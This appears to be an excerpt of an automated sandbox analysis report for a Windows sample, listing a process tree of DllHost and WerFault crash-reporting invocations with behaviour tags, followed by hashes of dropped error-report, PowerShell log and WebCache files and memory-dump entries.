C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4576 -s 384
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1956 -s 476
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3892 -s 684
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3552 -s 772
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2572 -s 388
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Enumerates system info in registry
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\RuntimeBroker.exe -Embedding
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3968 -s 400
    - Checks processor information in registry
C:\Windows\System32\svchost.exe -k WerSvcGroup
  C:\Windows\system32\WerFault.exe -pss -s 408 -p 3968 -ip 3968
  C:\Windows\system32\WerFault.exe -pss -s 404 -p 4072 -ip 4072
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 4332 -ip 4332
  C:\Windows\system32\WerFault.exe -pss -s 424 -p 2288 -ip 2288
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 4808 -ip 4808
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 572 -p 4256 -ip 4256
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 584 -p 3524 -ip 3524
  C:\Windows\system32\WerFault.exe -pss -s 624 -p 2100 -ip 2100
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 4152 -ip 4152
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 4952 -ip 4952
  C:\Windows\system32\WerFault.exe -pss -s 664 -p 3848 -ip 3848
  C:\Windows\system32\WerFault.exe -pss -s 680 -p 1152 -ip 1152
  C:\Windows\system32\WerFault.exe -pss -s 676 -p 764 -ip 764
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 3400 -ip 3400
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 612 -p 4072 -ip 4072
  C:\Windows\system32\WerFault.exe -pss -s 608 -p 2016 -ip 2016
  C:\Windows\system32\WerFault.exe -pss -s 584 -p 3128 -ip 3128
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 644 -p 3048 -ip 3048
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 3828 -ip 3828
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 624 -p 2964 -ip 2964
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 4692 -ip 4692
  C:\Windows\system32\WerFault.exe -pss -s 652 -p 4492 -ip 4492
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 2504 -ip 2504
  C:\Windows\system32\WerFault.exe -pss -s 472 -p 2976 -ip 2976
  C:\Windows\system32\WerFault.exe -pss -s 652 -p 3292 -ip 3292
  C:\Windows\system32\WerFault.exe -pss -s 584 -p 2996 -ip 2996
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 1228 -ip 1228
  C:\Windows\system32\WerFault.exe -pss -s 508 -p 3196 -ip 3196
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 4240 -ip 4240
  C:\Windows\system32\WerFault.exe -pss -s 564 -p 3248 -ip 3248
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 2592 -ip 2592
  C:\Windows\system32\WerFault.exe -pss -s 504 -p 2740 -ip 2740
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 748 -ip 748
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 1844 -ip 1844
  C:\Windows\system32\WerFault.exe -pss -s 584 -p 4152 -ip 4152
  C:\Windows\system32\WerFault.exe -pss -s 512 -p 4336 -ip 4336
  C:\Windows\system32\WerFault.exe -pss -s 632 -p 3048 -ip 3048
  C:\Windows\system32\WerFault.exe -pss -s 632 -p 4648 -ip 4648
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 600 -p 3028 -ip 3028
  C:\Windows\system32\WerFault.exe -pss -s 612 -p 1404 -ip 1404
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 1200 -ip 1200
  C:\Windows\system32\WerFault.exe -pss -s 504 -p 560 -ip 560
  C:\Windows\system32\WerFault.exe -pss -s 568 -p 5084 -ip 5084
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 596 -p 3624 -ip 3624
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 3068 -ip 3068
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 3928 -ip 3928
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 468 -p 3692 -ip 3692
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 384 -p 4788 -ip 4788
    - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -pss -s 384 -p 4124 -ip 4124
  C:\Windows\system32\WerFault.exe -pss -s 516 -p 528 -ip 528
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 3036 -ip 3036
  C:\Windows\system32\WerFault.exe -pss -s 652 -p 4824 -ip 4824
  C:\Windows\system32\WerFault.exe -pss -s 584 -p 2976 -ip 2976
  C:\Windows\system32\WerFault.exe -pss -s 572 -p 2396 -ip 2396
  C:\Windows\system32\WerFault.exe -pss -s 548 -p 1688 -ip 1688
C:\Windows\system32\WerFault.exe -u -p 4072 -s 808
  - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4332 -s 400
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2288 -s 400
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
  C:\Windows\system32\WerFault.exe -u -p 4808 -s 452
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
  C:\Windows\system32\WerFault.exe -u -p 4256 -s 368
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3524 -s 664
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 2100 -s 368
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4952 -s 792
C:\Windows\system32\WerFault.exe -u -p 4152 -s 656
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3848 -s 664
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1152 -s 472
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 764 -s 368
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3400 -s 784
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4072 -s 680
C:\Windows\system32\WerFault.exe -u -p 2016 -s 720
  - Checks processor information in registry
  - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 3128 -s 500
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3828 -s 720
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 3048 -s 656
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4692 -s 804
C:\Windows\system32\WerFault.exe -u -p 2964 -s 656
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4492 -s 484
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2504 -s 712
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3292 -s 656
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 2976 -s 420
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 2996 -s 656
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1228 -s 780
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3196 -s 492
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4240 -s 420
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3248 -s 492
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2592 -s 772
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 2740 -s 496
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - Checks processor information in registry
  C:\Windows\system32\WerFault.exe -u -p 748 -s 636
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1844 -s 664
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4152 -s 420
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4336 -s 492
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 3048 -s 720
  - Checks processor information in registry
  - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3028 -s 288
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 4648 -s 660
C:\Windows\system32\WerFault.exe -u -p 1404 -s 420
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1200 -s 468
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\WerFault.exe -u -p 560 -s 772
  - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 5084 -s 664
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - Checks processor information in registry
  - Enumerates system info in registry
  C:\Windows\system32\WerFault.exe -u -p 3624 -s 780
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3068 -s 444
    - Checks processor information in registry
C:\Windows\system32\WerFault.exe -u -p 3928 -s 720
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3692 -s 360
C:\Windows\system32\WerFault.exe -u -p 4788 -s 460
  - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4124 -s 664
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 528 -s 372
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3036 -s 656
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4824 -s 228
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2396 -s 724
C:\Windows\system32\WerFault.exe -u -p 2976 -s 408
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
SHA512e8e3efefa21a245e8c3351ce5ef9d47410c7e7dc72e1ead0c5f9e9f7f592fec10aacabb7ceb7706f6485027496c4f14cd7df69d3071d11a9db69dc6d3b986874
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B8E.tmp.txtFilesize
13KB
MD5324fa23bd20dbc2458505cc12b2f3b21
SHA1d0ab034bd721bbcbb6d14267360fce176d477ccf
SHA25660f08b2644ea5045a9ccef8af3936ef235365ed2d4b3ca08071ada81054b3ff6
SHA5123d8c4da8cf41d3c66de319cb80a402520c4a8742eb7974f85bc99da1778a4c3821bea45994403b8af1229a8e9ed07ea3fadf76b3af1d72ad6471b9ab51349462
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E2F.tmp.csvFilesize
35KB
MD534bf4ad66eabeb60b7e9a61f91717db1
SHA1d994b805afe8582fef5dc97a63c440b0f948aa97
SHA2566d3bf48dd5e9ffacf28442c8d01561cb02de2193b7327f34eaae31e7de98a979
SHA512447acc097f9292e44691a370aeac15731bcd9239d252ae90429a5406c67467f235655767fa4f0183dd464512e990d8f7f8fd1383681fc81673c034a259e8f230
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8E.tmp.txtFilesize
13KB
MD520a9cbefb82e69b6b8ba4ce8b8cf8145
SHA1d814570ff7a76883160f601ffe4fad3583dc4e51
SHA256d2fce6d9c3eb389de235dc201cc3ed030fcaa0a9874ae7adf41b581f037b9296
SHA512aeb754bd4c8c3a13bc5b69abfbaddd24fec5dc8d8ad24fe09681bdc4b23992a3b4d0654d7f92c94307a5136432a5b46dc1f5e5b6a82447f41c9104f9ca1f50f6
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6248.tmp.csvFilesize
35KB
MD5f4387261d247788e36f920558a9e0bfd
SHA1691a64e516df529bd6f24a17054203c9f6f2fac8
SHA256bd0defff346703ca872600687db8cbd4516103914063dab68f273c38ae0216c7
SHA51247ce60af875a1c6f6cc1d82694a7e11484c5712b2840f6c56ba0b4a088ae41e6fd090bd5d9508a08a1b6b470111a594abd4e879c0849304659982a2ba1fe9fc9
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6297.tmp.txtFilesize
13KB
MD5711d45976dc2c0cbaad939306097d75e
SHA16e2db9c4391b76347623a04c76570ddc550a8a10
SHA256c821520a7e4e37a61b65ec5ea2b1ef62e575356d51db259fbf6379fd44eb7024
SHA512876a92a14a1413e88b648ebff001db050489b5a9fe26326073dd62042edf559be728b388cb142b7a0e8397ed4b9621b43f8caba26609b7060839d2da3145ad66
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6680.tmp.csvFilesize
35KB
MD558b54e53f929548b1648e612c2e48aaa
SHA10e4169fbc5cc2343e05740f8ca730b078ef89167
SHA256121379321ba73fb73eabe634ef515b7f2a56657c5ba20a710a35e63393aa26f6
SHA512047a12e9b05a7e0a659ee2200231d9c680c7ce6eded3b0e193fa1a964d77f629eebe838be39be6dbbb9d4f55ada2a49f9946747567d7f20039a4bcbf22f96526
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER66DF.tmp.txtFilesize
13KB
MD5473f075293e56b9ad7a154c1a7464871
SHA12996f53fc0360b1d5af0325e53520a3ea448df64
SHA256b926587e6cba850572669fa698d425e96bb358d3907bdfabb62e00336d2c94f8
SHA5121c8e8a8169bb7558ad4d467b492bf92bf48acd0dc142b569b95057a9cf91946add4cd852d05d2a401d43c410004910ccb1f28214e91818eb9af674ed1228be21
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C4F.tmp.csvFilesize
35KB
MD554446418f568b17675442ff54b74403b
SHA1448d21772954e4884c244ea86da1b1cf8c209f62
SHA25687429af6400cbc0a03db15bc3c3a07dd90c5675b61835a61d32e0b63eb401074
SHA512c2819824a686d2d072bd50a41b0b27e9b87607e84954290bf588c26968ea15bd8ddd9956eefc5465244615b7fbfa531723141b057af53a8005fb0e1a6816dda2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCA.tmp.csvFilesize
37KB
MD589bba14587bbad527c1717acdd041932
SHA16029a7acedd82e25896ec4e47272f701539b096e
SHA25604efdc0da3f5a97bfedd81d4328ce2e2fbc3bcb775fc71b00d48892490d1688e
SHA512d454179e5e82f2ed77b8d8b73139b0a2a34ce73a31c90d1410263938d809f7cde93656bf9084f09c1064421eec0f819dfccb7f64540b13616dfe1c427272ce80
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA.tmp.txtFilesize
13KB
MD51ba3631dc4571b55b88d2649c73e866e
SHA18b050bb85ebf20e951cf75d2f9db95960a90a62d
SHA256241af7f54aec6fd216a77d2f58786f9016e4cf0f0fe8f344a35cb418f7c390b0
SHA51221e9fa793d4c06fd153c5ed872500401ee47dadd13d52a6481e8bd89adb06748509baa10219ee6342a2a8298306a7392fb7142bd635fa324a314a68eaab59b58
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0B.tmp.csvFilesize
36KB
MD58f7391a32ee95f222f0814733a1dbd46
SHA173ec491c9171999d64de6931b6bf415dbed0ecaf
SHA256ee793053e07781788226f5da02dab5ae8933d7ee37f2af08bda47d5a565fecd6
SHA512fffea4561c3ccc72fa6c1eb6fc662799aa9af5de4d845d36e3da2bedd0539aeb99bc4184d38e3809c9d12e09c7b234d8f31039982533d43ce48096ee29d1a347
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE98.tmp.txtFilesize
13KB
MD52c2016e9e72363e7710a024ef733a295
SHA1e06826f182a49c3271a0d2a65979935ba447c6e7
SHA256ba9b0d99e24fe3932d684d3b1553b6bcf01806956179cfce648c2c57bf76300f
SHA5121b27b27111b6bc02312f8adf14ffd0280f5c128df50394aee609d5c47da6d2f8467cd8800b0244b4074ae46bdaea674282068c132d257138928a188af893ecdd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5c6c940df49fc678d1c74fea3c57a32f9
SHA179edd715358a82e6d29970998ff2e9b235ea4217
SHA2564e50925adb70141467a7081cc905c76fd6dab841195400683f9f67fc2602aa0a
SHA5123c1df9c18f1756ead841f68916dec03a066078b0705443d3f886fd990e2e42ebbffd46916be3f6fe39ea0505fc2c848fbdea56828fbd5aa5f24b329f8d979707
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD510ae6f2b5e6893c74eafd9b625c82064
SHA1f291984547a32e3bad788411dfeee908c05f4824
SHA256ad96f0864460f97b8ad3dcd15f084de716aeedb2b34d6df57977928e668dd237
SHA5122b4de6c69aa1f19fe6c32ce771c6aff6684b82accb84799fe67cc0db8fc19fa96fe6cb9bfc2ee9ceb376bb1ba0116944d7b191c730c5a77a5e0f6d2245d87915
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD5a6b8f04b0cbe243eb76dfc60be4b2505
SHA10c2cadfa7dcc033de1f1cc54afcb31a81e4361bf
SHA256505538f1e1a0a43adb520e90cc20ee36c8ba811795206ff4a8b615427e4abba4
SHA512d1c1fdaf55e60a6338b6f7406b6f53c8b8dadb26780a7433446fb654af7826ea61d246950dc0f6f084850464bb63e3630a8725f9b3d4067665c92558c821ac71
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD53cf64035df002befe57b1895b33ed2af
SHA138d18bdf44df4dd7c0c065c59912756443cd6caf
SHA256e0241db17ae76d16ac8007aff03d8c087b4d341d03e225308f2c9d9dc2b494ec
SHA512f6e36fddb4268264a6586ae70ac3157b3ba777089d13543d7189ec39b81ed46c16368731e848ded31fa09d17b2c0abcd5f5f3f70a8c89d2ffae1ececd9a11f9f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD51da3f861a8228153b2e3eadb195a31b5
SHA1574dc03d5337786f5dc5ce5e49580e9200e86ec7
SHA2564fd75be0e23124979f8f52cc367d97bd3732cb19dadf4b0e2a76cf548c8a75f4
SHA51202eaf7b3f0aa876582fc29ba8265cd5f3d4fd16be2dcd68013706aee36bd17b35e4c531de27b201508a4af477172633864227a19f688c12318375f56824008b4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD5b4d5a9b915533b2ca468e29311bbddc1
SHA10a0196a433568a49a502e430c667b7b6ca896698
SHA25698783ae9b6092132f677e1f29a901abe6096065a26201f0eb3e04b29dcf2a222
SHA5121bceec22585ca5770f21b79364d3266e26633cfa1981c9556f3dbfe3434d28fd935ec5f42b33d6c9c7742426f2c35e3008223ceefea607b2371acae07b15957d
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045\1688073636Filesize
6KB
MD5579367f0fb7a178ad84e4b6e601ad1a8
SHA1151cb308e065da85c2e61424ba08469d0c63230f
SHA256c2a2d48f7c694f5d2057902d84617703fd43ff25511235fc83a6526494f3fc0c
SHA512b013d289bcae0fd66c390538544b4baa538a5175376fc4ece4ad9c9b1b6d2d45a1ddc59603d52592896619b3205bbac0468fda3ce2cc004131224c5c1348d01f
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\430e163f9413469fa1a50ab021b40ec5_1Filesize
1KB
MD53f4ffdd5bc81b6d49828f2d63fed321e
SHA17713ef7fb5625d26b15ec1b1ad287b299e489737
SHA2565b76beabd6e7a45b4c604886bc4328785185bb8c6b35ec24c983a32856b7106b
SHA5126f4096d6475a090682296522cb06b1a9aed6e88d0c9c8bc45b6e0e8a5d91a06cc42d241c0b6a710b340af2a0acc75a3fda4d075238162734fbe0ef1cbe8e5e28
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rpuazp1w.afj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58e7a623fcc311b5017c82b1181911569
SHA1048d36afc6481760c53cff348c05744d98f3cce7
SHA2569d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d
SHA5123848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d1630fe1f6dac32eadccc9b14f6f1e71
SHA1a5df3ac4f5ecb2e44a557c2b4376633d15288271
SHA25657f94736ae5f4204f3fda76dc70ee39fdbdebaa852c474ddff382f076f810feb
SHA512e99618f83a87b88b8436b6e04c623b52701fce789bf5671b3c64f91ea0f5319f11c7db9bf23a2bd1789c63b44321e9e7f6e97c245ab133d1e17919ec8f5de0a1
-
memory/60-239-0x00007FF8AEAD0000-0x00007FF8AEAE0000-memory.dmpFilesize
64KB
-
memory/60-235-0x0000020BEC1E0000-0x0000020BEC20A000-memory.dmpFilesize
168KB
-
memory/60-248-0x0000020BEC1E0000-0x0000020BEC20A000-memory.dmpFilesize
168KB
-
memory/408-133-0x000001DD7F1F0000-0x000001DD7F272000-memory.dmpFilesize
520KB
-
memory/408-135-0x000001DD7EFF0000-0x000001DD7F012000-memory.dmpFilesize
136KB
-
memory/408-144-0x000001DD7D920000-0x000001DD7D930000-memory.dmpFilesize
64KB
-
memory/408-145-0x000001DD7F780000-0x000001DD7F882000-memory.dmpFilesize
1.0MB
-
memory/408-147-0x000001DD7D950000-0x000001DD7D960000-memory.dmpFilesize
64KB
-
memory/436-458-0x000002175DBA0000-0x000002175DBCA000-memory.dmpFilesize
168KB
-
memory/452-249-0x0000021A8A370000-0x0000021A8A39A000-memory.dmpFilesize
168KB
-
memory/452-245-0x00007FF8AEAD0000-0x00007FF8AEAE0000-memory.dmpFilesize
64KB
-
memory/452-243-0x0000021A8A370000-0x0000021A8A39A000-memory.dmpFilesize
168KB
-
memory/624-225-0x00007FF8AEAD0000-0x00007FF8AEAE0000-memory.dmpFilesize
64KB
-
memory/624-221-0x000001D0928F0000-0x000001D092913000-memory.dmpFilesize
140KB
-
memory/624-223-0x000001D092920000-0x000001D09294A000-memory.dmpFilesize
168KB
-
memory/624-240-0x000001D092920000-0x000001D09294A000-memory.dmpFilesize
168KB
-
memory/680-496-0x0000020D0F180000-0x0000020D0F1AA000-memory.dmpFilesize
168KB
-
memory/692-244-0x0000022863560000-0x000002286358A000-memory.dmpFilesize
168KB
-
memory/692-228-0x00007FF8AEAD0000-0x00007FF8AEAE0000-memory.dmpFilesize
64KB
-
memory/692-226-0x0000022863560000-0x000002286358A000-memory.dmpFilesize
168KB
-
memory/716-254-0x00007FF8AEAD0000-0x00007FF8AEAE0000-memory.dmpFilesize
64KB
-
memory/716-289-0x000001ADB5EA0000-0x000001ADB5ECA000-memory.dmpFilesize
168KB
-
memory/716-252-0x000001ADB5EA0000-0x000001ADB5ECA000-memory.dmpFilesize
168KB
-
memory/792-492-0x0000014C19FB0000-0x0000014C19FDA000-memory.dmpFilesize
168KB
-
memory/852-237-0x00007FF6EB480000-0x00007FF6EB748000-memory.dmpFilesize
2.8MB
-
memory/852-229-0x00007FF6EB480000-0x00007FF6EB748000-memory.dmpFilesize
2.8MB
-
